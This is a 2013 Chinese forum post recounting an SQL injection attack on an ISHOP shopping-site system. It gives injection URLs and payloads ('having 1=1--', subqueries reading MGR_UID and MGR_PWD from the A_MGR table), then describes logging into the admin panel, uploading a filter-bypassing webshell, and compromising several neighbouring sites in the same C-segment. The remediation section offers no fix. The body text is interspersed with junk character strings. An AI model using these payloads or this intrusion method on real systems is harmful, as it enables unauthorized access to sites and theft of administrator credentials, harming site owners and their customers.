找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2230|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
发现一个注入点% e" ?' f8 X+ {  h
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389# h9 Z# I" ]( _8 K2 I

1 g) p, F9 g. r9 p  a- U0 \& P: O  v习惯性的加’having1=1--
/ J) \: l/ V4 `- e; o5 x+ Y5 @. o! ?8 k5 {& |
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
+ ^+ |5 o0 l* e# O/ E3 c0 \2 ^  l
! m' j: ~+ p, o. r# A0
; U" r( m7 O8 g5 \. [
+ a" ?4 X8 g4 O& I2 L$ Z) W- J爆出Diary_A.dl_Title(这时候很激动啊)9 _3 ]+ E9 f, l8 F6 z
  e' ?2 S2 a2 V' f( \' }$ o( D- x
那么继续* o9 u3 {! D+ t8 ^8 }2 Y
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—  v+ n6 c* N( M

4 n5 |5 o6 N; ~4 _+ a* D9 D继续,一直爆下去- Q6 [4 j/ d# I1 A$ e* S  `

7 O) ^7 J8 V2 B+ W- K爆到几个字段和表段 但是没找到需要的管理用户的字段$ r! g/ M  Q7 T  N8 C6 B

/ x4 g2 q/ S2 @6 k' z; R蛋疼了 怎么办 然后去后台登陆页看源码
3 T" p0 w4 m& q* L% V% O1 H. y$ q+ B/ T4 S, y% M
0
, D* K* l. L7 x# E- a+ b2 o9 B* ]4 c
Input name= “ADUID”
- T# d( B& Q8 x1 C0 x. O. }4 bInput name= “ADPWD”
6 K8 a, n8 s" m4 k1 l) U1 f, j- X' M' |; G+ J
很幸运 找到了字段那就继续! t" l* r. \& q+ V  _& n. e
找到之后开始爆用户' j) [( \& A) y& ~- P
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
2 O- W; E! D: v+ t$ ]爆密码6 q8 u# [" y% D3 r
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
2 w4 W0 p8 U! W! M: [' d% N测试了下 这个注入点只能爆到文章哪里的表 : B+ L) }' N4 _1 e0 @/ m

" Q7 i/ q/ N$ ]4 a" c+ \头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了. H7 R! S. d3 G

. U/ q9 B5 z6 j( A又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了! M* G; z4 X& c+ w. j" G& t

7 s6 V! z4 L9 B+ y7 r0 a4 a  ?9 h4736 V6 U8 O! ^0 e1 L

. Y" y. S2 m8 p0 Q进后台
) x" o, L! b2 d7 j$ }1 G, X" N$ _) g: T1 i0 |: B" K) N

1 m2 \, t% {$ |发现几个上传点 有的地方不能上传 而且防止恶意代码
' N$ L. }1 E' V4 w* Y9 p# \$ U. O2 J: x
没办法 各种百度各种找大牛 找到一只好像可以突破的马
) [3 k" k" h" Y6 G; l! D8 r( I2 b; Q, |: R
( ~6 c0 _' [, t8 ]) L6 @% b
在系统管理那里直接上传 不过没有显示地址! o( [) R( ?1 {# ^! P, v- a8 l

- D$ o5 R9 K; h  \& ?6 u再上传一次 抓包 搞定OK' t- w  E7 H5 L9 P
* y$ x  n8 ?6 S
2 y% s, l2 K1 J# a3 [3 A
2 P" J' V$ _2 m5 `& L% P3 E# O0 \
472% l  C, Y% P4 |+ V- A; L

7 ^! B$ U7 f; B$ H* \1 L晚上不行了 去睡觉。。。# c6 b& w* b) ~, S/ x& z
第二天刚起床 闲的没事做继续日站吧
/ h) _7 \6 |- b) V/ P. Z# j$ s0 {
! y" v" Q% C; H' J找个站 就把这个站的旁c扫了下/ a8 [0 `6 h8 e) J5 }. f: x
- ]2 S! q$ e! i
发现c段也有一个购物站 ,然后还和这个站的模板差不多
; Q4 y% {4 S0 J! _. {7 U7 F7 Y* H, S) r6 t: I8 J
就找到会员登录口测试7 `8 s. H& w) f/ @  ?: ]' r; Z" z7 X$ P- F

: U: ?6 ~6 s/ _( N# b'and (select top 1 MGR_UID from A_MGR)>0—
; q+ a, U5 p/ f3 t# v果断爆到了 这时候我很激动 通杀; m* w0 P- u7 p( [7 E
) D. ]6 z4 H: c/ d. b9 c' h( A
再次翻c段
& U3 U7 x9 E' s# ~4 }5 p2 S6 \7 e  Q9 w; S: o; w
翻出几个站 都成功拿下
: r5 H+ q$ T1 v4 o9 q" g8 ]: |" u5 t. ?; i0 O; y
" ?* f* x' r9 z, e
1 b0 i. `" ^5 k8 U6 G' ^( g, I
修复方案:* B% K5 D2 s+ L% W9 W& e
他们比我专业
' j  x/ A" e3 g" n4 l* j8 I& K, ]2 k( b: V5 d* z3 J* j2 k5 q0 ?' w

- z3 `. v: o% ?7 C% j1 i0 i1 Q, {4 o
# ^& [) X, ~9 Y/ B: y+ z, `. e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表